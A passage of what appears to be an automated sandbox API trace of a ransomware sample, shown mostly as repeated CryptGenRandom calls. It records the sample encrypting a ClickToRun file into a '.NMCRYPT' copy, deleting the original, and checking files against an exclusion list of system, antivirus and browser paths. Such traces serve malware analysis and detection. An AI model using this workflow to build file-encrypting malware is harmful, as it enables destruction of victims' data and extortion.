pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.437] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.437] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.438] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d22c | out: phHash=0x60d22c) returned 1 [0143.438] CryptHashData (hHash=0x8be0f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.438] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x8be0f8, dwFlags=0x4, phKey=0x60d230 | out: phKey=0x60d230*=0x8be1b8) returned 1 [0143.438] CryptSetKeyParam (hKey=0x8be1b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.438] CryptSetKeyParam (hKey=0x8be1b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.438] wcslen (_String="\\\\?\\") returned 0x4 [0143.438] CryptDuplicateKey (in: hKey=0x8be1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8bdbb8) returned 1 [0143.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0143.439] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=63) returned 1 [0143.439] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.440] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x3f, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x3f, lpOverlapped=0x0) returned 1 [0143.441] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x3f, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x40) returned 1 [0143.441] GetLastError () returned 0x0 [0143.441] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x40, lpOverlapped=0x0) returned 1 [0143.442] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0143.442] WriteFile (in: hFile=0x588, lpBuffer=0x607978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0143.442] CloseHandle (hObject=0x5a0) returned 1 [0143.442] CloseHandle (hObject=0x588) returned 1 [0143.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json")) returned 0x20 [0143.443] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json", dwFileAttributes=0x20) returned 1 [0143.443] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json") returned 1 [0143.443] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\clientcapabilities.json")) returned 1 [0143.444] CryptDestroyKey (hKey=0x8bdbb8) returned 1 [0143.444] wcslen (_String="OK") returned 0x2 [0143.444] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.444] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.444] CryptDestroyKey (hKey=0x8be1b8) returned 1 [0143.444] CryptDestroyHash (hHash=0x8be0f8) returned 1 [0143.444] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0143.444] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.444] PathMatchSpecW (pszFile="ClientTelemetry.dll", pszSpec="*NMCRYPT") returned 0 [0143.444] PathMatchSpecW (pszFile="ClientTelemetry.dll", pszSpec="*Recovers your files.html") returned 0 [0143.444] PathMatchSpecW (pszFile="ClientTelemetry.dll", pszSpec="*.exe") returned 0 [0143.444] PathMatchSpecW (pszFile="ClientTelemetry.dll", pszSpec="*.dll") returned 1 [0143.444] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.444] PathMatchSpecW (pszFile="concrt140.dll", pszSpec="*NMCRYPT") returned 0 [0143.444] PathMatchSpecW (pszFile="concrt140.dll", pszSpec="*Recovers your files.html") returned 0 [0143.444] PathMatchSpecW (pszFile="concrt140.dll", pszSpec="*.exe") returned 0 [0143.444] PathMatchSpecW (pszFile="concrt140.dll", pszSpec="*.dll") returned 1 [0143.444] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.444] PathMatchSpecW (pszFile="i640.hash", pszSpec="*NMCRYPT") returned 0 [0143.444] PathMatchSpecW (pszFile="i640.hash", pszSpec="*Recovers your files.html") returned 0 [0143.444] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.exe") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.dll") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.lnk") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.bat") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.ini") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.msi") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*.scf") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*pagefile.sys*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*NTUSER.DAT*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*AppData*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\winrar\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\java\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\TeamViewer\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\windows\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\ESET\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\AVG\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\AVIRA\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*\\AVAST Software\\*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*Atheros*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*Realtek*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*bootmgr*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*boot*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*boot*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*CONFIG.SYS*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*IO.SYS*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*MSDOS.SYS*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*NTDETECT.COM*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*ntldr*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*chrome*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*opera*") returned 0 [0143.445] PathMatchSpecW (pszFile="i640.hash", pszSpec="*firefox*") returned 0 [0143.445] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", pszSpec="*") returned 1 [0143.445] strlen (_Str="NMoreira") returned 0x8 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.445] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.446] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.447] CryptGenRandom (in: hProv=0x8bf310, 